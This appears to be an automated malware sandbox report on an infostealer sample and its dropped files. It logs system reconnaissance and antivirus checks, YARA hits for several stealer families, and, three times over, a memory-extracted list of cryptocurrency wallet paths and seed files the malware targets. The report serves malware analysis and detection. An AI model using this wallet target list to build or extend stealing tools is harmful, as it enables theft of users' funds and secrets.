Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: GetLocaleInfoW, 0_2_0042079E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: EnumSystemLocalesW, 0_2_05C004F8
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: EnumSystemLocalesW, 0_2_05C0045D
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: EnumSystemLocalesW, 0_2_05C00412
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: GetLocaleInfoW, 0_2_05C007D3
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: GetLocaleInfoW, 0_2_05C007D5
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: GetLocaleInfoW, 0_2_05BF774B
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_05C0019A
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_05C008FE
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: EnumSystemLocalesW, 0_2_05BF7358
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_05C00AD2
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: GetLocaleInfoW, 0_2_05C00A05
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 1_2_00414570
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the installation date of Windows
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_0040996D
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA, 1_2_004143C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 1_2_004144B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBC8390 NSS_GetVersion, 1_2_6BBC8390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected Mars stealer
Source: Yara match File source: 1.2.u5c4.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.u5c4.0.exe.4300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.u5c4.0.exe.42d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.u5c4.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.u5c4.0.exe.4300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.u5c4.0.exe.42d0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f7ae0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f7ae0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f79a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f79a0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2126631376.00000240F198B000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: 18.2.MSBuild.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cmd.exe.60900c8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.cmd.exe.5dd00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cmd.exe.60900c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.cmd.exe.5dd00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2374551290.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2139879271.0000000006090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2374844469.0000000000822000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 7216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 1524, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\pasb, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\khjsru, type: DROPPED
Yara detected Stealc
Source: Yara match File source: 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: u5c4.0.exe PID: 416, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 1.2.u5c4.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.u5c4.0.exe.4300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.u5c4.0.exe.42d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.u5c4.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.u5c4.0.exe.4300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.u5c4.0.exe.42d0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: u5c4.0.exe PID: 416, type: MEMORYSTR
Yara detected zgRAT
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE
Found many strings related to Crypto-Wallets (likely being stolen)
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
